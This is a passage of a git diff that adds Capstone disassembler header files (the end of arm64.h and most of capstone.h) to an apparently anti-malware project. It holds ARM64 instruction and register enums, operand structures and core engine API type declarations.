ARM64_REG_FP = ARM64_REG_X29, + ARM64_REG_LR = ARM64_REG_X30, +} arm64_reg; + +/// Instruction's operand referring to memory +/// This is associated with ARM64_OP_MEM operand type above +typedef struct arm64_op_mem { + arm64_reg base; ///< base register + arm64_reg index; ///< index register + int32_t disp; ///< displacement/offset value +} arm64_op_mem; + +/// Instruction operand +typedef struct cs_arm64_op { + int vector_index; ///< Vector Index for some vector operands (or -1 if irrelevant) + arm64_vas vas; ///< Vector Arrangement Specifier + arm64_vess vess; ///< Vector Element Size Specifier + struct { + arm64_shifter type; ///< shifter type of this operand + unsigned int value; ///< shifter value of this operand + } shift; + arm64_extender ext; ///< extender type of this operand + arm64_op_type type; ///< operand type + union { + arm64_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value, or index for C-IMM or IMM operand + double fp; ///< floating point value for FP operand + arm64_op_mem mem; ///< base/index/scale/disp value for MEM operand + arm64_pstate pstate; ///< PState field of MSR instruction. 
+ unsigned int sys; ///< IC/DC/AT/TLBI operation (see arm64_ic_op, arm64_dc_op, arm64_at_op, arm64_tlbi_op) + arm64_prefetch_op prefetch; ///< PRFM operation. + arm64_barrier_op barrier; ///< Memory barrier operation (ISB/DMB/DSB instructions). + }; + + /// How is this operand accessed? (READ, WRITE or READ|WRITE) + /// This field is combined of cs_ac_type. + /// NOTE: this field is irrelevant if engine is compiled in DIET mode. + uint8_t access; +} cs_arm64_op; + +/// Instruction structure +typedef struct cs_arm64 { + arm64_cc cc; ///< conditional code for this insn + bool update_flags; ///< does this insn update flags? + bool writeback; ///< does this insn request writeback? 'True' means 'yes' + + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + + cs_arm64_op operands[8]; ///< operands for this instruction. +} cs_arm64; + +/// ARM64 instruction +typedef enum arm64_insn { + ARM64_INS_INVALID = 0, + + ARM64_INS_ABS, + ARM64_INS_ADC, + ARM64_INS_ADDHN, + ARM64_INS_ADDHN2, + ARM64_INS_ADDP, + ARM64_INS_ADD, + ARM64_INS_ADDV, + ARM64_INS_ADR, + ARM64_INS_ADRP, + ARM64_INS_AESD, + ARM64_INS_AESE, + ARM64_INS_AESIMC, + ARM64_INS_AESMC, + ARM64_INS_AND, + ARM64_INS_ASR, + ARM64_INS_B, + ARM64_INS_BFM, + ARM64_INS_BIC, + ARM64_INS_BIF, + ARM64_INS_BIT, + ARM64_INS_BL, + ARM64_INS_BLR, + ARM64_INS_BR, + ARM64_INS_BRK, + ARM64_INS_BSL, + ARM64_INS_CBNZ, + ARM64_INS_CBZ, + ARM64_INS_CCMN, + ARM64_INS_CCMP, + ARM64_INS_CLREX, + ARM64_INS_CLS, + ARM64_INS_CLZ, + ARM64_INS_CMEQ, + ARM64_INS_CMGE, + ARM64_INS_CMGT, + ARM64_INS_CMHI, + ARM64_INS_CMHS, + ARM64_INS_CMLE, + ARM64_INS_CMLT, + ARM64_INS_CMTST, + ARM64_INS_CNT, + ARM64_INS_MOV, + ARM64_INS_CRC32B, + ARM64_INS_CRC32CB, + ARM64_INS_CRC32CH, + ARM64_INS_CRC32CW, + ARM64_INS_CRC32CX, + ARM64_INS_CRC32H, + ARM64_INS_CRC32W, + ARM64_INS_CRC32X, + ARM64_INS_CSEL, + ARM64_INS_CSINC, + ARM64_INS_CSINV, + ARM64_INS_CSNEG, + ARM64_INS_DCPS1, + ARM64_INS_DCPS2, + 
ARM64_INS_DCPS3, + ARM64_INS_DMB, + ARM64_INS_DRPS, + ARM64_INS_DSB, + ARM64_INS_DUP, + ARM64_INS_EON, + ARM64_INS_EOR, + ARM64_INS_ERET, + ARM64_INS_EXTR, + ARM64_INS_EXT, + ARM64_INS_FABD, + ARM64_INS_FABS, + ARM64_INS_FACGE, + ARM64_INS_FACGT, + ARM64_INS_FADD, + ARM64_INS_FADDP, + ARM64_INS_FCCMP, + ARM64_INS_FCCMPE, + ARM64_INS_FCMEQ, + ARM64_INS_FCMGE, + ARM64_INS_FCMGT, + ARM64_INS_FCMLE, + ARM64_INS_FCMLT, + ARM64_INS_FCMP, + ARM64_INS_FCMPE, + ARM64_INS_FCSEL, + ARM64_INS_FCVTAS, + ARM64_INS_FCVTAU, + ARM64_INS_FCVT, + ARM64_INS_FCVTL, + ARM64_INS_FCVTL2, + ARM64_INS_FCVTMS, + ARM64_INS_FCVTMU, + ARM64_INS_FCVTNS, + ARM64_INS_FCVTNU, + ARM64_INS_FCVTN, + ARM64_INS_FCVTN2, + ARM64_INS_FCVTPS, + ARM64_INS_FCVTPU, + ARM64_INS_FCVTXN, + ARM64_INS_FCVTXN2, + ARM64_INS_FCVTZS, + ARM64_INS_FCVTZU, + ARM64_INS_FDIV, + ARM64_INS_FMADD, + ARM64_INS_FMAX, + ARM64_INS_FMAXNM, + ARM64_INS_FMAXNMP, + ARM64_INS_FMAXNMV, + ARM64_INS_FMAXP, + ARM64_INS_FMAXV, + ARM64_INS_FMIN, + ARM64_INS_FMINNM, + ARM64_INS_FMINNMP, + ARM64_INS_FMINNMV, + ARM64_INS_FMINP, + ARM64_INS_FMINV, + ARM64_INS_FMLA, + ARM64_INS_FMLS, + ARM64_INS_FMOV, + ARM64_INS_FMSUB, + ARM64_INS_FMUL, + ARM64_INS_FMULX, + ARM64_INS_FNEG, + ARM64_INS_FNMADD, + ARM64_INS_FNMSUB, + ARM64_INS_FNMUL, + ARM64_INS_FRECPE, + ARM64_INS_FRECPS, + ARM64_INS_FRECPX, + ARM64_INS_FRINTA, + ARM64_INS_FRINTI, + ARM64_INS_FRINTM, + ARM64_INS_FRINTN, + ARM64_INS_FRINTP, + ARM64_INS_FRINTX, + ARM64_INS_FRINTZ, + ARM64_INS_FRSQRTE, + ARM64_INS_FRSQRTS, + ARM64_INS_FSQRT, + ARM64_INS_FSUB, + ARM64_INS_HINT, + ARM64_INS_HLT, + ARM64_INS_HVC, + ARM64_INS_INS, + + ARM64_INS_ISB, + ARM64_INS_LD1, + ARM64_INS_LD1R, + ARM64_INS_LD2R, + ARM64_INS_LD2, + ARM64_INS_LD3R, + ARM64_INS_LD3, + ARM64_INS_LD4, + ARM64_INS_LD4R, + + ARM64_INS_LDARB, + ARM64_INS_LDARH, + ARM64_INS_LDAR, + ARM64_INS_LDAXP, + ARM64_INS_LDAXRB, + ARM64_INS_LDAXRH, + ARM64_INS_LDAXR, + ARM64_INS_LDNP, + ARM64_INS_LDP, + ARM64_INS_LDPSW, + ARM64_INS_LDRB, + 
ARM64_INS_LDR, + ARM64_INS_LDRH, + ARM64_INS_LDRSB, + ARM64_INS_LDRSH, + ARM64_INS_LDRSW, + ARM64_INS_LDTRB, + ARM64_INS_LDTRH, + ARM64_INS_LDTRSB, + + ARM64_INS_LDTRSH, + ARM64_INS_LDTRSW, + ARM64_INS_LDTR, + ARM64_INS_LDURB, + ARM64_INS_LDUR, + ARM64_INS_LDURH, + ARM64_INS_LDURSB, + ARM64_INS_LDURSH, + ARM64_INS_LDURSW, + ARM64_INS_LDXP, + ARM64_INS_LDXRB, + ARM64_INS_LDXRH, + ARM64_INS_LDXR, + ARM64_INS_LSL, + ARM64_INS_LSR, + ARM64_INS_MADD, + ARM64_INS_MLA, + ARM64_INS_MLS, + ARM64_INS_MOVI, + ARM64_INS_MOVK, + ARM64_INS_MOVN, + ARM64_INS_MOVZ, + ARM64_INS_MRS, + ARM64_INS_MSR, + ARM64_INS_MSUB, + ARM64_INS_MUL, + ARM64_INS_MVNI, + ARM64_INS_NEG, + ARM64_INS_NOT, + ARM64_INS_ORN, + ARM64_INS_ORR, + ARM64_INS_PMULL2, + ARM64_INS_PMULL, + ARM64_INS_PMUL, + ARM64_INS_PRFM, + ARM64_INS_PRFUM, + ARM64_INS_RADDHN, + ARM64_INS_RADDHN2, + ARM64_INS_RBIT, + ARM64_INS_RET, + ARM64_INS_REV16, + ARM64_INS_REV32, + ARM64_INS_REV64, + ARM64_INS_REV, + ARM64_INS_ROR, + ARM64_INS_RSHRN2, + ARM64_INS_RSHRN, + ARM64_INS_RSUBHN, + ARM64_INS_RSUBHN2, + ARM64_INS_SABAL2, + ARM64_INS_SABAL, + + ARM64_INS_SABA, + ARM64_INS_SABDL2, + ARM64_INS_SABDL, + ARM64_INS_SABD, + ARM64_INS_SADALP, + ARM64_INS_SADDLP, + ARM64_INS_SADDLV, + ARM64_INS_SADDL2, + ARM64_INS_SADDL, + ARM64_INS_SADDW2, + ARM64_INS_SADDW, + ARM64_INS_SBC, + ARM64_INS_SBFM, + ARM64_INS_SCVTF, + ARM64_INS_SDIV, + ARM64_INS_SHA1C, + ARM64_INS_SHA1H, + ARM64_INS_SHA1M, + ARM64_INS_SHA1P, + ARM64_INS_SHA1SU0, + ARM64_INS_SHA1SU1, + ARM64_INS_SHA256H2, + ARM64_INS_SHA256H, + ARM64_INS_SHA256SU0, + ARM64_INS_SHA256SU1, + ARM64_INS_SHADD, + ARM64_INS_SHLL2, + ARM64_INS_SHLL, + ARM64_INS_SHL, + ARM64_INS_SHRN2, + ARM64_INS_SHRN, + ARM64_INS_SHSUB, + ARM64_INS_SLI, + ARM64_INS_SMADDL, + ARM64_INS_SMAXP, + ARM64_INS_SMAXV, + ARM64_INS_SMAX, + ARM64_INS_SMC, + ARM64_INS_SMINP, + ARM64_INS_SMINV, + ARM64_INS_SMIN, + ARM64_INS_SMLAL2, + ARM64_INS_SMLAL, + ARM64_INS_SMLSL2, + ARM64_INS_SMLSL, + ARM64_INS_SMOV, + ARM64_INS_SMSUBL, + 
ARM64_INS_SMULH, + ARM64_INS_SMULL2, + ARM64_INS_SMULL, + ARM64_INS_SQABS, + ARM64_INS_SQADD, + ARM64_INS_SQDMLAL, + ARM64_INS_SQDMLAL2, + ARM64_INS_SQDMLSL, + ARM64_INS_SQDMLSL2, + ARM64_INS_SQDMULH, + ARM64_INS_SQDMULL, + ARM64_INS_SQDMULL2, + ARM64_INS_SQNEG, + ARM64_INS_SQRDMULH, + ARM64_INS_SQRSHL, + ARM64_INS_SQRSHRN, + ARM64_INS_SQRSHRN2, + ARM64_INS_SQRSHRUN, + ARM64_INS_SQRSHRUN2, + ARM64_INS_SQSHLU, + ARM64_INS_SQSHL, + ARM64_INS_SQSHRN, + ARM64_INS_SQSHRN2, + ARM64_INS_SQSHRUN, + ARM64_INS_SQSHRUN2, + ARM64_INS_SQSUB, + ARM64_INS_SQXTN2, + ARM64_INS_SQXTN, + ARM64_INS_SQXTUN2, + ARM64_INS_SQXTUN, + ARM64_INS_SRHADD, + ARM64_INS_SRI, + ARM64_INS_SRSHL, + ARM64_INS_SRSHR, + ARM64_INS_SRSRA, + ARM64_INS_SSHLL2, + ARM64_INS_SSHLL, + ARM64_INS_SSHL, + ARM64_INS_SSHR, + ARM64_INS_SSRA, + ARM64_INS_SSUBL2, + ARM64_INS_SSUBL, + ARM64_INS_SSUBW2, + ARM64_INS_SSUBW, + ARM64_INS_ST1, + ARM64_INS_ST2, + ARM64_INS_ST3, + ARM64_INS_ST4, + ARM64_INS_STLRB, + ARM64_INS_STLRH, + ARM64_INS_STLR, + ARM64_INS_STLXP, + ARM64_INS_STLXRB, + ARM64_INS_STLXRH, + ARM64_INS_STLXR, + ARM64_INS_STNP, + ARM64_INS_STP, + ARM64_INS_STRB, + ARM64_INS_STR, + ARM64_INS_STRH, + ARM64_INS_STTRB, + ARM64_INS_STTRH, + ARM64_INS_STTR, + ARM64_INS_STURB, + ARM64_INS_STUR, + ARM64_INS_STURH, + ARM64_INS_STXP, + ARM64_INS_STXRB, + ARM64_INS_STXRH, + ARM64_INS_STXR, + ARM64_INS_SUBHN, + ARM64_INS_SUBHN2, + ARM64_INS_SUB, + ARM64_INS_SUQADD, + ARM64_INS_SVC, + ARM64_INS_SYSL, + ARM64_INS_SYS, + ARM64_INS_TBL, + ARM64_INS_TBNZ, + ARM64_INS_TBX, + ARM64_INS_TBZ, + ARM64_INS_TRN1, + ARM64_INS_TRN2, + ARM64_INS_UABAL2, + ARM64_INS_UABAL, + ARM64_INS_UABA, + ARM64_INS_UABDL2, + ARM64_INS_UABDL, + ARM64_INS_UABD, + ARM64_INS_UADALP, + ARM64_INS_UADDLP, + ARM64_INS_UADDLV, + ARM64_INS_UADDL2, + ARM64_INS_UADDL, + ARM64_INS_UADDW2, + ARM64_INS_UADDW, + ARM64_INS_UBFM, + ARM64_INS_UCVTF, + ARM64_INS_UDIV, + ARM64_INS_UHADD, + ARM64_INS_UHSUB, + ARM64_INS_UMADDL, + ARM64_INS_UMAXP, + ARM64_INS_UMAXV, + 
ARM64_INS_UMAX, + ARM64_INS_UMINP, + ARM64_INS_UMINV, + ARM64_INS_UMIN, + ARM64_INS_UMLAL2, + ARM64_INS_UMLAL, + ARM64_INS_UMLSL2, + ARM64_INS_UMLSL, + ARM64_INS_UMOV, + ARM64_INS_UMSUBL, + ARM64_INS_UMULH, + ARM64_INS_UMULL2, + ARM64_INS_UMULL, + ARM64_INS_UQADD, + ARM64_INS_UQRSHL, + ARM64_INS_UQRSHRN, + ARM64_INS_UQRSHRN2, + ARM64_INS_UQSHL, + ARM64_INS_UQSHRN, + ARM64_INS_UQSHRN2, + ARM64_INS_UQSUB, + ARM64_INS_UQXTN2, + ARM64_INS_UQXTN, + ARM64_INS_URECPE, + ARM64_INS_URHADD, + ARM64_INS_URSHL, + ARM64_INS_URSHR, + ARM64_INS_URSQRTE, + ARM64_INS_URSRA, + ARM64_INS_USHLL2, + ARM64_INS_USHLL, + ARM64_INS_USHL, + ARM64_INS_USHR, + ARM64_INS_USQADD, + ARM64_INS_USRA, + ARM64_INS_USUBL2, + ARM64_INS_USUBL, + ARM64_INS_USUBW2, + ARM64_INS_USUBW, + ARM64_INS_UZP1, + ARM64_INS_UZP2, + ARM64_INS_XTN2, + ARM64_INS_XTN, + ARM64_INS_ZIP1, + ARM64_INS_ZIP2, + + // alias insn + ARM64_INS_MNEG, + ARM64_INS_UMNEGL, + ARM64_INS_SMNEGL, + ARM64_INS_NOP, + ARM64_INS_YIELD, + ARM64_INS_WFE, + ARM64_INS_WFI, + ARM64_INS_SEV, + ARM64_INS_SEVL, + ARM64_INS_NGC, + ARM64_INS_SBFIZ, + ARM64_INS_UBFIZ, + ARM64_INS_SBFX, + ARM64_INS_UBFX, + ARM64_INS_BFI, + ARM64_INS_BFXIL, + ARM64_INS_CMN, + ARM64_INS_MVN, + ARM64_INS_TST, + ARM64_INS_CSET, + ARM64_INS_CINC, + ARM64_INS_CSETM, + ARM64_INS_CINV, + ARM64_INS_CNEG, + ARM64_INS_SXTB, + ARM64_INS_SXTH, + ARM64_INS_SXTW, + ARM64_INS_CMP, + ARM64_INS_UXTB, + ARM64_INS_UXTH, + ARM64_INS_UXTW, + ARM64_INS_IC, + ARM64_INS_DC, + ARM64_INS_AT, + ARM64_INS_TLBI, + + ARM64_INS_NEGS, + ARM64_INS_NGCS, + + ARM64_INS_ENDING, // <-- mark the end of the list of insn +} arm64_insn; + +/// Group of ARM64 instructions +typedef enum arm64_insn_group { + ARM64_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + ARM64_GRP_JUMP, ///< = CS_GRP_JUMP + ARM64_GRP_CALL, + ARM64_GRP_RET, + ARM64_GRP_INT, + ARM64_GRP_PRIVILEGE = 6, ///< = CS_GRP_PRIVILEGE + ARM64_GRP_BRANCH_RELATIVE, ///< = 
CS_GRP_BRANCH_RELATIVE + + // Architecture-specific groups + ARM64_GRP_CRYPTO = 128, + ARM64_GRP_FPARMV8, + ARM64_GRP_NEON, + ARM64_GRP_CRC, + + ARM64_GRP_ENDING, // <-- mark the end of the list of groups +} arm64_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/capstone.h b/ai_anti_malware/capstone/include/capstone/capstone.h new file mode 100644 index 0000000..23c13d5 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/capstone.h @@ -0,0 +1,766 @@ +#ifndef CAPSTONE_ENGINE_H +#define CAPSTONE_ENGINE_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2016 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include + +#if defined(CAPSTONE_HAS_OSXKERNEL) +#include +#else +#include +#include +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#pragma warning(disable:4100) +#define CAPSTONE_API __cdecl +#ifdef CAPSTONE_SHARED +#define CAPSTONE_EXPORT __declspec(dllexport) +#else // defined(CAPSTONE_STATIC) +#define CAPSTONE_EXPORT +#endif +#else +#define CAPSTONE_API +#if defined(__GNUC__) && !defined(CAPSTONE_STATIC) +#define CAPSTONE_EXPORT __attribute__((visibility("default"))) +#else // defined(CAPSTONE_STATIC) +#define CAPSTONE_EXPORT +#endif +#endif + +#ifdef __GNUC__ +#define CAPSTONE_DEPRECATED __attribute__((deprecated)) +#elif defined(_MSC_VER) +#define CAPSTONE_DEPRECATED __declspec(deprecated) +#else +#pragma message("WARNING: You need to implement CAPSTONE_DEPRECATED for this compiler") +#define CAPSTONE_DEPRECATED +#endif + +// Capstone API version +#define CS_API_MAJOR 4 +#define CS_API_MINOR 0 + +// Version for bleeding edge code of the Github's "next" branch. +// Use this if you want the absolutely latest development code. +// This version number will be bumped up whenever we have a new major change. 
+#define CS_NEXT_VERSION 5 + +// Capstone package version +#define CS_VERSION_MAJOR CS_API_MAJOR +#define CS_VERSION_MINOR CS_API_MINOR +#define CS_VERSION_EXTRA 2 + +/// Macro to create combined version which can be compared to +/// result of cs_version() API. +#define CS_MAKE_VERSION(major, minor) ((major << 8) + minor) + +/// Maximum size of an instruction mnemonic string. +#define CS_MNEMONIC_SIZE 32 + +// Handle using with all API +typedef size_t csh; + +/// Architecture type +typedef enum cs_arch { + CS_ARCH_ARM = 0, ///< ARM architecture (including Thumb, Thumb-2) + CS_ARCH_ARM64, ///< ARM-64, also called AArch64 + CS_ARCH_MIPS, ///< Mips architecture + CS_ARCH_X86, ///< X86 architecture (including x86 & x86-64) + CS_ARCH_PPC, ///< PowerPC architecture + CS_ARCH_SPARC, ///< Sparc architecture + CS_ARCH_SYSZ, ///< SystemZ architecture + CS_ARCH_XCORE, ///< XCore architecture + CS_ARCH_M68K, ///< 68K architecture + CS_ARCH_TMS320C64X, ///< TMS320C64x architecture + CS_ARCH_M680X, ///< 680X architecture + CS_ARCH_EVM, ///< Ethereum architecture + CS_ARCH_MAX, + CS_ARCH_ALL = 0xFFFF, // All architectures - for cs_support() +} cs_arch; + +// Support value to verify diet mode of the engine. +// If cs_support(CS_SUPPORT_DIET) return True, the engine was compiled +// in diet mode. +#define CS_SUPPORT_DIET (CS_ARCH_ALL + 1) + +// Support value to verify X86 reduce mode of the engine. +// If cs_support(CS_SUPPORT_X86_REDUCE) return True, the engine was compiled +// in X86 reduce mode. 
+#define CS_SUPPORT_X86_REDUCE (CS_ARCH_ALL + 2) + +/// Mode type +typedef enum cs_mode { + CS_MODE_LITTLE_ENDIAN = 0, ///< little-endian mode (default mode) + CS_MODE_ARM = 0, ///< 32-bit ARM + CS_MODE_16 = 1 << 1, ///< 16-bit mode (X86) + CS_MODE_32 = 1 << 2, ///< 32-bit mode (X86) + CS_MODE_64 = 1 << 3, ///< 64-bit mode (X86, PPC) + CS_MODE_THUMB = 1 << 4, ///< ARM's Thumb mode, including Thumb-2 + CS_MODE_MCLASS = 1 << 5, ///< ARM's Cortex-M series + CS_MODE_V8 = 1 << 6, ///< ARMv8 A32 encodings for ARM + CS_MODE_MICRO = 1 << 4, ///< MicroMips mode (MIPS) + CS_MODE_MIPS3 = 1 << 5, ///< Mips III ISA + CS_MODE_MIPS32R6 = 1 << 6, ///< Mips32r6 ISA + CS_MODE_MIPS2 = 1 << 7, ///< Mips II ISA + CS_MODE_V9 = 1 << 4, ///< SparcV9 mode (Sparc) + CS_MODE_QPX = 1 << 4, ///< Quad Processing eXtensions mode (PPC) + CS_MODE_M68K_000 = 1 << 1, ///< M68K 68000 mode + CS_MODE_M68K_010 = 1 << 2, ///< M68K 68010 mode + CS_MODE_M68K_020 = 1 << 3, ///< M68K 68020 mode + CS_MODE_M68K_030 = 1 << 4, ///< M68K 68030 mode + CS_MODE_M68K_040 = 1 << 5, ///< M68K 68040 mode + CS_MODE_M68K_060 = 1 << 6, ///< M68K 68060 mode + CS_MODE_BIG_ENDIAN = 1 << 31, ///< big-endian mode + CS_MODE_MIPS32 = CS_MODE_32, ///< Mips32 ISA (Mips) + CS_MODE_MIPS64 = CS_MODE_64, ///< Mips64 ISA (Mips) + CS_MODE_M680X_6301 = 1 << 1, ///< M680X Hitachi 6301,6303 mode + CS_MODE_M680X_6309 = 1 << 2, ///< M680X Hitachi 6309 mode + CS_MODE_M680X_6800 = 1 << 3, ///< M680X Motorola 6800,6802 mode + CS_MODE_M680X_6801 = 1 << 4, ///< M680X Motorola 6801,6803 mode + CS_MODE_M680X_6805 = 1 << 5, ///< M680X Motorola/Freescale 6805 mode + CS_MODE_M680X_6808 = 1 << 6, ///< M680X Motorola/Freescale/NXP 68HC08 mode + CS_MODE_M680X_6809 = 1 << 7, ///< M680X Motorola 6809 mode + CS_MODE_M680X_6811 = 1 << 8, ///< M680X Motorola/Freescale/NXP 68HC11 mode + CS_MODE_M680X_CPU12 = 1 << 9, ///< M680X Motorola/Freescale/NXP CPU12 + ///< used on M68HC12/HCS12 + CS_MODE_M680X_HCS08 = 1 << 10, ///< M680X Freescale/NXP HCS08 mode +} 
cs_mode; + +typedef void* (CAPSTONE_API *cs_malloc_t)(size_t size); +typedef void* (CAPSTONE_API *cs_calloc_t)(size_t nmemb, size_t size); +typedef void* (CAPSTONE_API *cs_realloc_t)(void *ptr, size_t size); +typedef void (CAPSTONE_API *cs_free_t)(void *ptr); +typedef int (CAPSTONE_API *cs_vsnprintf_t)(char *str, size_t size, const char *format, va_list ap); + + +/// User-defined dynamic memory related functions: malloc/calloc/realloc/free/vsnprintf() +/// By default, Capstone uses system's malloc(), calloc(), realloc(), free() & vsnprintf(). +typedef struct cs_opt_mem { + cs_malloc_t malloc; + cs_calloc_t calloc; + cs_realloc_t realloc; + cs_free_t free; + cs_vsnprintf_t vsnprintf; +} cs_opt_mem; + +/// Customize mnemonic for instructions with alternative name. +/// To reset existing customized instruction to its default mnemonic, +/// call cs_option(CS_OPT_MNEMONIC) again with the same @id and NULL value +/// for @mnemonic. +typedef struct cs_opt_mnem { + /// ID of instruction to be customized. + unsigned int id; + /// Customized instruction mnemonic. + const char *mnemonic; +} cs_opt_mnem; + +/// Runtime option for the disassembled engine +typedef enum cs_opt_type { + CS_OPT_INVALID = 0, ///< No option specified + CS_OPT_SYNTAX, ///< Assembly output syntax + CS_OPT_DETAIL, ///< Break down instruction structure into details + CS_OPT_MODE, ///< Change engine's mode at run-time + CS_OPT_MEM, ///< User-defined dynamic memory related functions + CS_OPT_SKIPDATA, ///< Skip data when disassembling. Then engine is in SKIPDATA mode. + CS_OPT_SKIPDATA_SETUP, ///< Setup user-defined function for SKIPDATA option + CS_OPT_MNEMONIC, ///< Customize instruction mnemonic + CS_OPT_UNSIGNED, ///< print immediate operands in unsigned form +} cs_opt_type; + +/// Runtime option value (associated with option type above) +typedef enum cs_opt_value { + CS_OPT_OFF = 0, ///< Turn OFF an option - default for CS_OPT_DETAIL, CS_OPT_SKIPDATA, CS_OPT_UNSIGNED. 
+ CS_OPT_ON = 3, ///< Turn ON an option (CS_OPT_DETAIL, CS_OPT_SKIPDATA). + CS_OPT_SYNTAX_DEFAULT = 0, ///< Default asm syntax (CS_OPT_SYNTAX). + CS_OPT_SYNTAX_INTEL, ///< X86 Intel asm syntax - default on X86 (CS_OPT_SYNTAX). + CS_OPT_SYNTAX_ATT, ///< X86 ATT asm syntax (CS_OPT_SYNTAX). + CS_OPT_SYNTAX_NOREGNAME, ///< Prints register name with only number (CS_OPT_SYNTAX) + CS_OPT_SYNTAX_MASM, ///< X86 Intel Masm syntax (CS_OPT_SYNTAX). +} cs_opt_value; + +/// Common instruction operand types - to be consistent across all architectures. +typedef enum cs_op_type { + CS_OP_INVALID = 0, ///< uninitialized/invalid operand. + CS_OP_REG, ///< Register operand. + CS_OP_IMM, ///< Immediate operand. + CS_OP_MEM, ///< Memory operand. + CS_OP_FP, ///< Floating-Point operand. +} cs_op_type; + +/// Common instruction operand access types - to be consistent across all architectures. +/// It is possible to combine access types, for example: CS_AC_READ | CS_AC_WRITE +typedef enum cs_ac_type { + CS_AC_INVALID = 0, ///< Uninitialized/invalid access type. + CS_AC_READ = 1 << 0, ///< Operand read from memory or register. + CS_AC_WRITE = 1 << 1, ///< Operand write to memory or register. +} cs_ac_type; + +/// Common instruction groups - to be consistent across all architectures. +typedef enum cs_group_type { + CS_GRP_INVALID = 0, ///< uninitialized/invalid group. + CS_GRP_JUMP, ///< all jump instructions (conditional+direct+indirect jumps) + CS_GRP_CALL, ///< all call instructions + CS_GRP_RET, ///< all return instructions + CS_GRP_INT, ///< all interrupt instructions (int+syscall) + CS_GRP_IRET, ///< all interrupt return instructions + CS_GRP_PRIVILEGE, ///< all privileged instructions + CS_GRP_BRANCH_RELATIVE, ///< all relative branching instructions +} cs_group_type; + +/** + User-defined callback function for SKIPDATA option. + See tests/test_skipdata.c for sample code demonstrating this API. + + @code: the input buffer containing code to be disassembled. 
+ This is the same buffer passed to cs_disasm(). + @code_size: size (in bytes) of the above @code buffer. + @offset: the position of the currently-examining byte in the input + buffer @code mentioned above. + @user_data: user-data passed to cs_option() via @user_data field in + cs_opt_skipdata struct below. + + @return: return number of bytes to skip, or 0 to immediately stop disassembling. +*/ +typedef size_t (CAPSTONE_API *cs_skipdata_cb_t)(const uint8_t *code, size_t code_size, size_t offset, void *user_data); + +/// User-customized setup for SKIPDATA option +typedef struct cs_opt_skipdata { + /// Capstone considers data to skip as special "instructions". + /// User can specify the string for this instruction's "mnemonic" here. + /// By default (if @mnemonic is NULL), Capstone use ".byte". + const char *mnemonic; + + /// User-defined callback function to be called when Capstone hits data. + /// If the returned value from this callback is positive (>0), Capstone + /// will skip exactly that number of bytes & continue. Otherwise, if + /// the callback returns 0, Capstone stops disassembling and returns + /// immediately from cs_disasm() + /// NOTE: if this callback pointer is NULL, Capstone would skip a number + /// of bytes depending on architectures, as following: + /// Arm: 2 bytes (Thumb mode) or 4 bytes. + /// Arm64: 4 bytes. + /// Mips: 4 bytes. + /// M680x: 1 byte. + /// PowerPC: 4 bytes. + /// Sparc: 4 bytes. + /// SystemZ: 2 bytes. + /// X86: 1 bytes. + /// XCore: 2 bytes. + /// EVM: 1 bytes. + cs_skipdata_cb_t callback; // default value is NULL + + /// User-defined data to be passed to @callback function pointer. 
+ void *user_data; +} cs_opt_skipdata; + + +#include "arm.h" +#include "arm64.h" +#include "m68k.h" +#include "mips.h" +#include "ppc.h" +#include "sparc.h" +#include "systemz.h" +#include "x86.h" +#include "xcore.h" +#include "tms320c64x.h" +#include "m680x.h" +#include "evm.h" + +/// NOTE: All information in cs_detail is only available when CS_OPT_DETAIL = CS_OPT_ON +/// Initialized as memset(., 0, offsetof(cs_detail, ARCH)+sizeof(cs_ARCH)) +/// by ARCH_getInstruction in arch/ARCH/ARCHDisassembler.c +/// if cs_detail changes, in particular if a field is added after the union, +/// then update arch/ARCH/ARCHDisassembler.c accordingly +typedef struct cs_detail { + uint16_t regs_read[12]; ///< list of implicit registers read by this insn + uint8_t regs_read_count; ///< number of implicit registers read by this insn + + uint16_t regs_write[20]; ///< list of implicit registers modified by this insn + uint8_t regs_write_count; ///< number of implicit registers modified by this insn + + uint8_t groups[8]; ///< list of group this instruction belong to + uint8_t groups_count; ///< number of groups this insn belongs to + + /// Architecture-specific instruction info + union { + cs_x86 x86; ///< X86 architecture, including 16-bit, 32-bit & 64-bit mode + cs_arm64 arm64; ///< ARM64 architecture (aka AArch64) + cs_arm arm; ///< ARM architecture (including Thumb/Thumb2) + cs_m68k m68k; ///< M68K architecture + cs_mips mips; ///< MIPS architecture + cs_ppc ppc; ///< PowerPC architecture + cs_sparc sparc; ///< Sparc architecture + cs_sysz sysz; ///< SystemZ architecture + cs_xcore xcore; ///< XCore architecture + cs_tms320c64x tms320c64x; ///< TMS320C64x architecture + cs_m680x m680x; ///< M680X architecture + cs_evm evm; ///< Ethereum architecture + }; +} cs_detail; + +/// Detail information of disassembled instruction +typedef struct cs_insn { + /// Instruction ID (basically a numeric ID for the instruction mnemonic) + /// Find the instruction id in the '[ARCH]_insn' enum in the 
header file + /// of corresponding architecture, such as 'arm_insn' in arm.h for ARM, + /// 'x86_insn' in x86.h for X86, etc... + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + /// NOTE: in Skipdata mode, "data" instruction has 0 for this id field. + unsigned int id; + + /// Address (EIP) of this instruction + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + uint64_t address; + + /// Size of this instruction + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + uint16_t size; + + /// Machine bytes of this instruction, with number of bytes indicated by @size above + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + uint8_t bytes[16]; + + /// Ascii text of instruction mnemonic + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + char mnemonic[CS_MNEMONIC_SIZE]; + + /// Ascii text of instruction operands + /// This information is available even when CS_OPT_DETAIL = CS_OPT_OFF + char op_str[160]; + + /// Pointer to cs_detail. + /// NOTE: detail pointer is only valid when both requirements below are met: + /// (1) CS_OP_DETAIL = CS_OPT_ON + /// (2) Engine is not in Skipdata mode (CS_OP_SKIPDATA option set to CS_OPT_ON) + /// + /// NOTE 2: when in Skipdata mode, or when detail mode is OFF, even if this pointer + /// is not NULL, its content is still irrelevant. + cs_detail 